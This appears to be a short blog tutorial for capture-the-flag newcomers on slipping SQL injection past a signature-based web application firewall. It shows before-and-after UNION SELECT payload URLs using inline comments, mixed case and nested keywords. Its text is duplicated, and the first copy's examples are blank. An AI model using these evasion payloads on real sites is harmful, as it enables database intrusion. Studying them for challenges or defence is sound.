Hey all,
I have recently noticed quite a few newer users having trouble with challenges that involve WAF bypassing so here's a tutorial/reference for bypassing basic WAF's
What is a WAF?
WAF stands for Web Application Firewall. A WAF is put in place by the web applications administrator in an attempt to prevent attacks such as SQLi and XSS. They detect malicious attempts with the use of signature based filters and escapes defined within a list of rules. As a result of this design, they are vulnerable to being easily bypassed by obfuscating your exploit code.
Methods of Bypass
There are many more ways of bypassing these than I can list here but this is a basic overview of three common and easy methods to try first.
1. Comments
Comments can allow you to execute code without the WAF bothering check it.
Example
Before:
After:
2. Capitalization of Functions
Because detections are signature based, randomly capitalizing functions can allow them to slip under the heuristic radar.
Example
Before:
After:
3. Exploiting Escapes
Some WAF's will escape certain keywords such as UNION, SELECT, ORDER BY, etc. This can be used to our advantage by duplicating the detected word within another.
Example
Before:
After:
Assuming the filter escapes the keywords "union" and "select", our code will be executed as normal.
I have recently noticed quite a few newer users having trouble with challenges that involve WAF bypassing so here's a tutorial/reference for bypassing basic WAF's
What is a WAF?
WAF stands for Web Application Firewall. A WAF is put in place by the web applications administrator in an attempt to prevent attacks such as SQLi and XSS. They detect malicious attempts with the use of signature based filters and escapes defined within a list of rules. As a result of this design, they are vulnerable to being easily bypassed by obfuscating your exploit code.
Methods of Bypass
There are many more ways of bypassing these than I can list here but this is a basic overview of three common and easy methods to try first.
1. Comments
Comments can allow you to execute code without the WAF bothering check it.
Example
Before:
http://site.com/vuln.php?id=-1 UNION SELECT 1,2,3--After:
http://site.com/vuln.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3-- Before:http://site.com/vuln.php?id=-1 UNION SELECT 1,2,3-- Afterhttp://site.com/vuln.php?id=-1 /*!UnIoN SelEcT*/ 1,2,3-- 2. Capitalization of Functions
Because detections are signature based, randomly capitalizing functions can allow them to slip under the heuristic radar.
Example
Before:
http://site.com/vuln.php?id=-1 UNION SELECT 1,2,3--After:
http://site.com/vuln.php?id=-1 uNiOn SeLeCt 1,2,3--3. Exploiting Escapes
Some WAF's will escape certain keywords such as UNION, SELECT, ORDER BY, etc. This can be used to our advantage by duplicating the detected word within another.
Example
Before:
http://site.com/vuln.php?id=-1 UNION SELECT 1,2,3--After:
http://site.com/vuln.php?id=-1 UNIunionON SEselectLECT 1,2,3--Assuming the filter escapes the keywords "union" and "select", our code will be executed as normal.
No comments:
Post a Comment